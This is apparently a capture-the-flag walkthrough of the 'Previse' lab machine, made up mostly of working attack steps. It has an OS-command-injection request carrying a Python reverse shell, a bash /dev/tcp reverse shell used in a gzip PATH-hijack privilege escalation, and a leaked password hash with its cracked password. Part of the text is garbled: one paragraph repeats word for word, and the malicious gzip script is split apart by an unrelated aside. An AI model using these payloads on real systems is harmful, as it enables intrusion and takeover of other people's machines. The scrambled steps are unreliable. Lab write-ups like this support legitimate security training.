USER 

## NMAP for scan 

> $ nmap -sV -sC --script vulners -v -p- 10.10.11.104 | tee nmap.log

## Try to Bruteforce WebDomain
 
 Domain bruteforce with wfuzz

> $ wfuzz -c -v -z file,big.txt --hc '404' http://10.10.11.100/FUZZ
> add some .php extensions to bruteforce

some php files are redirecting to login.php its looks suspicious so is using curl to make the request and got
some juicy HTML files. We got some files and with these files we get an account creation form.

we can send a post data via Burp/curl (because we have Html file we know the name and id so we
can send a post data to accounts.php to create a new account)


curl -i -s -k -X $'POST' -H $'Host: 10.10.11.104' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Referer: http://10.10.11.104/nav.php' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Cookie: PHPSESSID=hd1f59eil728op2pdtbvmraipk' -H $'Connection: close' -b $'PHPSESSID=hd1f59eil728op2pdtbvmraipk' --data $'username=admin&password=admin&confirm=admin' $'http://10.10.11.104/accounts.php'
 
and we get in the application.

So first thing I did after getting a login , is download the backup-site code zip.
Note of Caution: Everything in this zip is original and not just a beta version of the original site.

After an hour of researching the php code, i found a basic vulnerability of os-injection .

Created a corrupt request for the injection.


==== REQUEST INJECTION ========

POST /logs.php HTTP/1.1
Host: 10.10.11.104
Content-Length: 251
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.11.104/file_logs.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e37qmamvn5dru7cfc80fugki5p
Connection: close

delim=comma;export+RHOST%3d"YOUR_VPN_IP"%3bexport+RPORT%3d9001%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("/bin/bash")'


==========================================


While researching in the site files, Isaw mysql credentials as well as database name.
We use that to get info from table accounts.previse of m4lwhere user.
user:m4lwhere
password-hash:$1$≡ƒºéllol$DQpmdvnb7EeuO6UaqRItf.
carefull
≡ƒºé = 🧂
Converting the characters while in terminal and mysql, it loses its identity.

actual password-hash:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Using John-the-ripper

We use that to get info from table accounts.previse of m4lwhere user.
user:m4lwhere
password-hash:$1$≡ƒºéllol$DQpmdvnb7EeuO6UaqRItf.
carefull
≡ƒºé = 🧂
Converting the characters while in terminal and mysql, it loses its identity.

actual password-hash:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Using John-the-ripper

password:ilovecody112235!


and we get the user.

#Priv Escalation - ROOT


Linux Privilege Escalation with Path Injection - Gzip

1.- First, you need a process/script/cron-job or anything that runs gzip as the root user

2.- Now let's create a new gzip program in the path tmp or /dev/shm (here we have enough permissions), which will contain our attacker reverse shell.

nano gzip

#!/bin/bash

with 

$ sudo -l 

we check the following script is running as a root:

/opt/scripts/access_backup.sh


bash -i &> /dev/tcp/10.10.14.162/1313 0>&1

Do not forget to give it execution permissions
chmod +x gzip

3.- Then it is time for path injection, this attack is based on changing the value of the $PATH variable, in this variable are the paths where the programs run in our system, so if we want our malicious gzip program to run from tmp, we have to change the PATH to run gzip on this directory first instead of /usr/bin or /usr/sbin which is probably where the original gzip file is.

echo $PATH //Verify which is the original PATH
export PATH=.:$PATH //We change the path so that the current directory takes precedence over the others

where the operator . is our current directory

It can also be done in this way:
export PATH=$(pwd):$PATH

4.- Check if you changed the path correctly:

echo $PATH

Also do not forget to start a listener:
sudo nc -nlvp 1313

5.- Now it only remains to launch the script that runs gzip as root, to get a privileged reverse shell
sudo /opt/scripts/access_backup.sh


And we got the reverse shell with root privs.


#References

https://medium.com/acm-juit/previse-htb-writeup-a3d0acecb937
https://www.youtube.com/watch?v=jjOa9jPdlHg&ab_channel=MateusMuller
